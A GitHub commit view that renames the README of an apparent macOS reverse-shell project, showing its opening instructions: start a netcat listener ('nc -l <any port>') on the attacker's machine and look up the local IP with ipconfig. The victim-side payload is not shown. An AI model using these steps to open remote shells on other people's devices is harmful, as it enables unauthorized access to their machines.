Update and rename README.txt to README.md

pull/79/head
fatherthomas 2022-07-10 00:03:18 -07:00 committed by GitHub
parent 18dbf72df4
commit 63e48dca14
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 1 deletions

View File

@ -1,7 +1,8 @@
# This is, at heart, is a simple reverse shell to gain access to another MacOSX device. I'm looking into creating a tight shell that can run like a daemon but that is a wet dream atm. # This is, at heart, is a simple reverse shell to gain access to another MacOSX device. I'm looking into creating a tight shell that can run like a daemon but that is a wet dream atm.
# FIRST STEP(s): # FIRST STEP(s):
# run "nc -l <any port>" on the attackers machine # run this on the attackers machine
nc -l <any port>
# This initialzes your computers listening protocol to look for TCP connections # This initialzes your computers listening protocol to look for TCP connections
**IMPORTANT** **IMPORTANT**
# open another Terminal window and run "ipconfig getifaddr en0" to obtain your computers local ip (this is important for the next step) # open another Terminal window and run "ipconfig getifaddr en0" to obtain your computers local ip (this is important for the next step)